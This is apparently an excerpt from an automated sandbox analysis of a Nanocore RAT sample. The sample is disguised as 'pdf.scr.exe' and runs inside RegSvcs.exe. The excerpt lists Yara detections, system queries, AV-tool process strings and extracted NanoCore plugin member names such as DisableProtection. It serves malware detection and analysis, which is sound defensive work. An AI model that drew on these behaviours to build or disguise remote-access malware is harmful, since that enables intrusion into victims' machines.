Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003EF654 cpuid 0_2_003EF654
Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003EDF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle, 0_2_003EDF1E
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BFE5F8 GetUserNameW, 6_2_00BFE5F8
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003DB146 GetVersionExW, 0_2_003DB146
AV process strings found (often used to terminate AV products)
Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.327029047.000000000179B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000002.334819122.000000000179D000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.333726359.000000000179C000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.326732376.0000000001786000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.320691747.000000000177C000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.383734271.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.380904548.0000000000DF6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.382361308.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.381716379.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000002.386242165.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: procexp.exe
Source: ihgsvw.exe, 00000015.00000003.383734271.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.380904548.0000000000DF6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.382361308.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.381716379.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000002.386242165.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.382138122.0000000000E4D000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.382214127.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000002.486870938.0000000000EDD000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.476366235.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474700596.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474135636.0000000000E68000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: regshot.exe

Stealing of Sensitive Information
barindex
Yara detected Nanocore RAT
Source: Yara match File source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.ihgsvw.exe.ec6330.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.RegSvcs.exe.6210000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.3.ihgsvw.exe.1929698.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.3.ihgsvw.exe.fa1920.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.ihgsvw.exe.17f8880.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.ihgsvw.exe.1810638.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.RegSvcs.exe.3c3560b.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.3.ihgsvw.exe.f38910.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.3.ihgsvw.exe.19926a8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.RegSvcs.exe.3c3b041.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.ihgsvw.exe.17f8880.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.3.ihgsvw.exe.1929698.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.3.ihgsvw.exe.12c76a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.3.ihgsvw.exe.19926a8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.3.ihgsvw.exe.133eea0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.3.ihgsvw.exe.12c76a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.3.ihgsvw.exe.133eea0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.3.ihgsvw.exe.13306b0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.ihgsvw.exe.1810638.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.RegSvcs.exe.3c3b041.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.RegSvcs.exe.6214629.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.RegSvcs.exe.6210000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 3008, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 2200, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 2756, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 5040, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 2788, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 5648, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTR
OS version to string mapping found (often used in BOTs)
Source: ihgsvw.exe Binary or memory string: WIN_81
Source: ihgsvw.exe Binary or memory string: WIN_XP
Source: ihgsvw.exe, 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmp Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: ihgsvw.exe Binary or memory string: WIN_XPe
Source: ihgsvw.exe Binary or memory string: WIN_VISTA
Source: ihgsvw.exe Binary or memory string: WIN_7
Source: ihgsvw.exe Binary or memory string: WIN_8

Remote Access Functionality
barindex
Detected Nanocore Rat
Source: ihgsvw.exe, 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: ihgsvw.exe, 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
Source: RegSvcs.exe, 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsA